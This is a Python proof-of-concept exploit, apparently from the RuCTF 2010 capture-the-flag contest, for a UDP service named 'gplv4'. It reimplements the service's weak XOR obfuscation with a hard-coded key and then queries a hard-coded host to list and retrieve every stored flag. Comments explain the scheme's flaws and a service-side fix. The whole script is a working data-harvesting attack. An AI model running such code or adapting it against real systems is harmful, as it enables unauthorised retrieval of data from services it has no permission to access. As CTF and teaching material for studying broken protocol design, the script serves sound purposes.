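# ructf2010 gplv4 poc
# http://smokedchicken.org
#
# Client-side proof of concept for the UDP protocol of the "gplv4" service
# (name taken from the header above). Every datagram is passed through
# encode()/decode() with a key that is a constant in this file.
#
# Security notes on the scheme, all visible in decode() below:
#   * Only the first 8-byte block is XORed with the key; each later block is
#     XORed with the previous *ciphertext* block (P[i] = C[i] ^ C[i-1]).
#     Everything after the first 8 bytes is therefore recoverable from a
#     captured datagram without the key. Treat this as obfuscation, not
#     encryption.
#   * Nothing authenticates a datagram (no MAC, nonce, or sequence number is
#     handled here), so this layer cannot detect modification or replay.
#   * The key is a source-level constant; presumably every deployment shares
#     it (confirm against the service).
# A fix on the service side would be authenticated encryption with a
# per-deployment key.
#
# The script was written for Python 2 byte strings. The pure helpers
# (encode/decode) also work on Python 3 `str`, but the socket calls would need
# bytes there.
from socket import *
import random


def decode(key, data):
    """Recover the plaintext from ciphertext *data* produced by encode().

    Args:
        key: String XORed against the first block. The callers in this file
            always pass 8 characters.
        data: Ciphertext as a string of single-byte characters.

    Returns:
        The decoded string. With an 8-character key it has the same length as
        *data*. With any other key length the first step still emits
        min(len(key), len(data)) characters, exactly as the original did.
    """
    out = []
    for index in range(0, len(data), 8):
        if index < 8:
            # First block: static key, bounded by the shorter operand.
            count = min(len(key), len(data))
            out.extend(chr(ord(data[i]) ^ ord(key[i])) for i in range(count))
        else:
            # Later blocks: the pad is the previous 8 bytes of ciphertext, so
            # the key plays no part from here on.
            pad = data[index - 8:index]
            count = min(len(pad), len(data) - index)
            out.extend(
                chr(ord(data[index + i]) ^ ord(pad[i])) for i in range(count)
            )
    # Join once instead of growing a string one character at a time.
    return "".join(out)


def encode(key, data):
    """Obfuscate *data* with the XOR-with-ciphertext-feedback scheme.

    Args:
        key: String XORed against the first block. The callers in this file
            always pass 8 characters.
        data: Plaintext as a string of single-byte characters.

    Returns:
        The encoded string; decode() with the same key reverses it.
    """
    out = []
    for index in range(0, len(data), 8):
        if index < 8:
            # First block: static key, bounded by the shorter operand.
            count = min(len(key), len(data))
            out.extend(chr(ord(data[i]) ^ ord(key[i])) for i in range(count))
        else:
            # Later blocks: the pad is the 8 characters of output emitted just
            # before this offset (the previous ciphertext block).
            pad = out[index - 8:index]
            count = min(len(pad), len(data) - index)
            out.extend(
                chr(ord(data[index + i]) ^ ord(pad[i])) for i in range(count)
            )
    return "".join(out)


def udp_transfer(data, host, norecv):
    """Send one datagram to *host* and optionally wait for a single reply.

    Args:
        data: Payload to send (already encoded by the caller).
        host: Destination address.
        norecv: 0 to wait for a reply; any other value returns right after
            sending.

    Returns:
        The reply payload (at most 500 bytes; a longer datagram is truncated
        by recvfrom) when norecv == 0, otherwise None.
    """
    # The destination port is drawn at random from 1025..65534; presumably the
    # service answers on any port in that range (confirm against the service).
    port = random.randint(1025, 65534)
    udp = socket(AF_INET, SOCK_DGRAM)
    try:
        udp.sendto(data, (host, port))
        if norecv == 0:
            # NOTE: no timeout is set, so this blocks until a datagram arrives.
            data2, _addr = udp.recvfrom(500)
            return data2
        return None
    finally:
        # The original never closed the socket, leaking one descriptor per call.
        udp.close()


def put_flag(host):
    """Send the hard-coded 'P...' command to *host* without waiting for a reply."""
    key = 'THINKPAD'
    cmd_put = 'Pfgzl-4sbb-2sx6:ADHASDKASDIAIDADADAPIASPDIDPQ43='
    data = encode(key, cmd_put)
    udp_transfer(data, host, 1)


key = 'THINKPAD'
host = '10.40.3.113'

# Guarded so that importing this module to reuse encode()/decode(), for
# example to decode captured traffic, does not send packets as a side effect.
# Running the file as a script behaves as before.
if __name__ == "__main__":
    # put_flag(host)  -- left disabled by the author
    cmd_list = 'L'
    data = encode(key, cmd_list)
    data2 = udp_transfer(data, host, 0)
    flags_string = decode(key, data2)
    # The 'L' reply is handled as a ';'-separated list; iteration stops at the
    # first empty entry.
    flags = flags_string.split(';')
    for flag in flags:
        if flag == "":
            break
        cmd_get = "G" + flag
        data = encode(key, cmd_get)
        data2 = udp_transfer(data, host, 0)
        # The parenthesised single-argument form prints the same text on
        # Python 2 and also parses on Python 3.
        print(decode(key, data2))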